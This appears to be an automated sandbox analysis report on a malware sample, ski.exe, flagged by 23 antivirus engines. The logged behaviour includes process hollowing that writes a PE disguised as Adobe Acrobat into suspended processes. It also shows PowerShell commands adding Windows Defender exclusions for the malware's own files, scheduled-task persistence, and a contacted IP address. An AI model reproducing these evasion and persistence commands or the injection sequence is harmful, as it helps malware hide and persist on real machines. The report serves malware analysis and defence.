file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log
file	C:\Users\test22\AppData\Local\Temp\RGI1518.tmp-tmp
file	C:\Users\test22\AppData\Local\Temp\splashen.bmp
file	C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000017.log
file	C:\Users\test22\AppData\Local\Temp\chrome_installer.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 KOR Language Pack Setup_20200715_141443571.html
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000020.log
file	C:\Users\test22\AppData\Local\Temp\RGIC87.tmp-tmp
file	C:\Users\test22\AppData\Local\Temp\java_install.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000007.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Temp\bchC68D.tmp
file	C:\Users\test22\AppData\Local\Temp\dd_vcredistUI7C06.txt
file	C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 Setup_20200715_141303844.html
file	C:\Users\test22\AppData\Local\Temp\PrinterSetup.log

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2236 resumed a thread in remote process 1580
Process injection	Process 1080 resumed a thread in remote process 2504
Process injection	Process 2220 resumed a thread in remote process 2748
Process injection	Process 2268 resumed a thread in remote process 2156
NtResumeThread Oct. 19, 2021, 9:44 a.m.	thread_handle: 0x00000398 suspend_count: 1 process_identifier: 1580	1	0	0
NtResumeThread Oct. 19, 2021, 9:56 a.m.	thread_handle: 0x000003b0 suspend_count: 1 process_identifier: 2504	1	0	0
NtResumeThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2748	1	0	0
NtResumeThread Oct. 19, 2021, 9:56 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2156	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Lionic	Trojan.Multi.Generic.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
McAfee	RDN/Generic.grp
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
K7GW	Trojan ( 004b4b1c1 )
Cyren	W32/MSIL_Kryptik.FWN.gen!Eldorado
ESET-NOD32	a variant of MSIL/Packed.Confuser.K suspicious
APEX	Malicious
Kaspersky	UDS:DangerousObject.Multi.Generic
McAfee-GW-Edition	BehavesLike.Win32.Generic.cc
FireEye	Generic.mg.1b465c6989637df1
Ikarus	Trojan.Inject
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Microsoft	Trojan:Win32/Woreflint.A!cl
VBA32	CIL.StupidPInvoker-1.Heur
Cylance	Unsafe
Yandex	Trojan.Slntscn24.bWfT6q
SentinelOne	Static AI - Malicious PE
BitDefenderTheta	Gen:NN.ZemsilF.34218.1m0@aij5mCp
Paloalto	generic.ml
MaxSecure	Trojan.Malware.300983.susgen

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

91.134.207.16:80

Executed a process and injected code into it, probably while unpacking (50 out of 70 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 19, 2021, 9:43 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2236	1	0
NtResumeThread Oct. 19, 2021, 9:43 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2236	1	0
NtResumeThread Oct. 19, 2021, 9:43 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2236	1	0
NtResumeThread Oct. 19, 2021, 9:43 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 2236	1	0
NtGetContextThread Oct. 19, 2021, 9:43 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Oct. 19, 2021, 9:43 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread Oct. 19, 2021, 9:43 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2236	1	0
NtResumeThread Oct. 19, 2021, 9:44 a.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 2236	1	0
CreateProcessInternalW Oct. 19, 2021, 9:44 a.m.	thread_identifier: 532 thread_handle: 0x0000042c process_identifier: 456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ski.exe" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000434	1	1
CreateProcessInternalW Oct. 19, 2021, 9:44 a.m.	thread_identifier: 2396 thread_handle: 0x000002c0 process_identifier: 2240 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000434	1	1
CreateProcessInternalW Oct. 19, 2021, 9:44 a.m.	thread_identifier: 1632 thread_handle: 0x00000398 process_identifier: 1580 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\ski.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\ski.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000003a0	1	1
NtGetContextThread Oct. 19, 2021, 9:44 a.m.	thread_handle: 0x00000398	1	0
NtAllocateVirtualMemory Oct. 19, 2021, 9:44 a.m.	process_identifier: 1580 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a0	1	0
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELnGaàNl @ À@ÈkS H.text$L N `.rsrc P@@.reloc Z@B base_address: 0x00400000 process_identifier: 1580 process_handle: 0x000003a0	1	1
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: base_address: 0x00402000 process_identifier: 1580 process_handle: 0x000003a0	1	1
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: 8Ph èäxäè4VS_VERSION_INFO½ïþ ?DVarFileInfo$Translation°HStringFileInfo$000004b0CommentsHCompanyNameAdobe Systems, Inc.TFileDescriptionAdobe Acrobat XIV Pro4 FileVersion13.10.3.2LInternalNameAdobe Acrobat XIV Prol$LegalCopyrightCopyright © 2013 Adobe Systems Inc.TLegalTrademarksAdobe Acrobat XIV ProTOriginalFilenameAdobe Acrobat XIV ProLProductNameAdobe Acrobat XIV Pro8 ProductVersion13.10.3.2< Assembly Version13.10.3.2ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00488000 process_identifier: 1580 process_handle: 0x000003a0	1	1
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: ` < base_address: 0x0048a000 process_identifier: 1580 process_handle: 0x000003a0	1	1
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1580 process_handle: 0x000003a0	1	1
NtSetContextThread Oct. 19, 2021, 9:44 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4746270 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000398 process_identifier: 1580	1	0
NtResumeThread Oct. 19, 2021, 9:44 a.m.	thread_handle: 0x00000398 suspend_count: 1 process_identifier: 1580	1	0
NtResumeThread Oct. 19, 2021, 9:44 a.m.	thread_handle: 0x0000042c suspend_count: 1 process_identifier: 2236	1	0
NtResumeThread Oct. 19, 2021, 9:54 a.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 456	1	0
NtResumeThread Oct. 19, 2021, 9:54 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 456	1	0
NtResumeThread Oct. 19, 2021, 9:54 a.m.	thread_handle: 0x00000438 suspend_count: 1 process_identifier: 456	1	0
NtResumeThread Oct. 19, 2021, 9:54 a.m.	thread_handle: 0x00000498 suspend_count: 1 process_identifier: 456	1	0
NtResumeThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1080	1	0
NtResumeThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 1080	1	0
NtResumeThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 1080	1	0
NtResumeThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 1080	1	0
NtGetContextThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 1080	1	0
NtResumeThread Oct. 19, 2021, 9:56 a.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 1080	1	0
CreateProcessInternalW Oct. 19, 2021, 9:56 a.m.	thread_identifier: 2640 thread_handle: 0x00000434 process_identifier: 2928 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SubDir\winrara.exe" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000043c	1	1
CreateProcessInternalW Oct. 19, 2021, 9:56 a.m.	thread_identifier: 2420 thread_handle: 0x000003ac process_identifier: 2480 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmp220E.tmp" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000043c	1	1
CreateProcessInternalW Oct. 19, 2021, 9:56 a.m.	thread_identifier: 2096 thread_handle: 0x000003a0 process_identifier: 2620 current_directory: filepath: C:\Users\test22\AppData\Roaming\SubDir\winrara.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Roaming\SubDir\winrara.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000003a8	1	1
NtGetContextThread Oct. 19, 2021, 9:56 a.m.	thread_handle: 0x000003a0	1	0
NtAllocateVirtualMemory Oct. 19, 2021, 9:56 a.m.	process_identifier: 2620 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a8		3221225496
CreateProcessInternalW Oct. 19, 2021, 9:56 a.m.	thread_identifier: 656 thread_handle: 0x000003b0 process_identifier: 2504 current_directory: filepath: C:\Users\test22\AppData\Roaming\SubDir\winrara.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Roaming\SubDir\winrara.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000003d0	1	1
NtGetContextThread Oct. 19, 2021, 9:56 a.m.	thread_handle: 0x000003b0	1	0
NtAllocateVirtualMemory Oct. 19, 2021, 9:56 a.m.	process_identifier: 2504 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003d0	1	0
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELnGaàNl @ À@ÈkS H.text$L N `.rsrc P@@.reloc Z@B base_address: 0x00400000 process_identifier: 2504 process_handle: 0x000003d0	1	1
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: base_address: 0x00402000 process_identifier: 2504 process_handle: 0x000003d0	1	1
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: 8Ph èäxäè4VS_VERSION_INFO½ïþ ?DVarFileInfo$Translation°HStringFileInfo$000004b0CommentsHCompanyNameAdobe Systems, Inc.TFileDescriptionAdobe Acrobat XIV Pro4 FileVersion13.10.3.2LInternalNameAdobe Acrobat XIV Prol$LegalCopyrightCopyright © 2013 Adobe Systems Inc.TLegalTrademarksAdobe Acrobat XIV ProTOriginalFilenameAdobe Acrobat XIV ProLProductNameAdobe Acrobat XIV Pro8 ProductVersion13.10.3.2< Assembly Version13.10.3.2ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00488000 process_identifier: 2504 process_handle: 0x000003d0	1	1
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: ` < base_address: 0x0048a000 process_identifier: 2504 process_handle: 0x000003d0	1	1
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2504 process_handle: 0x000003d0	1	1
NtSetContextThread Oct. 19, 2021, 9:56 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4746270 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003b0 process_identifier: 2504	1	0
NtResumeThread Oct. 19, 2021, 9:56 a.m.	thread_handle: 0x000003b0 suspend_count: 1 process_identifier: 2504	1	0
NtResumeThread Oct. 19, 2021, 9:56 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 1080	1	0
NtResumeThread Oct. 19, 2021, 9:55 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 1648	1	0

ski.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All